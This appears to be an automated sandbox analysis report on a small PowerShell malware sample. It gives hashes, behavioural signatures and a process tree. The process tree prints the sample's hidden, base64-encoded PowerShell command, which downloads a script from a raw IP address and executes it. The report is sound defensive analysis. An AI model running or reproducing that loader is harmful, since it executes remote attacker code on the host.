Analysis
-
max time kernel
84s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
02-01-2025 18:18
Static task
static1
Behavioral task
behavioral1
Sample
2ps1.ps1
Resource
win7-20240729-en
General
-
Target
2ps1.ps1
-
Size
164B
-
MD5
005b395fecc3e18d5bc9acb93bf96a4f
-
SHA1
34db5ff90015817fe8b2fe56ca241d6965ae95d4
-
SHA256
5605af6e3cba4057057a8cc765f94d1112d1a147171e056b1bdfcc3b38a056f0
-
SHA512
199d54c7cda83e493e611da4f063baec08cbc6606f8fcedce13dc2413d67133ab26d68045981006db2eb3b996513cac09654867eb3cf00eaaac0a947934e6ff8
Malware Config
Signatures
-
pid Process 2348 powershell.exe 2860 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2348 powershell.exe 2860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2348 wrote to memory of 2860 2348 powershell.exe 30 PID 2348 wrote to memory of 2860 2348 powershell.exe 30 PID 2348 wrote to memory of 2860 2348 powershell.exe 30
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\2ps1.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5500f21566c770a5913426720d70dcc7a
SHA1bb0de982aa21c8ba733662fe40c517907b9f3110
SHA256570a4c13cac653862065a11776c2700027169ab9794beb637b418ea204f820a3
SHA5124835275c7f638a4e830834d3bc03e54ecc0718363e5b7f7190d701f1f99d197168faa1945db064fd4ffb72a1e002ffdafb8f47fb7d6703f529b26ba0a6afbf3f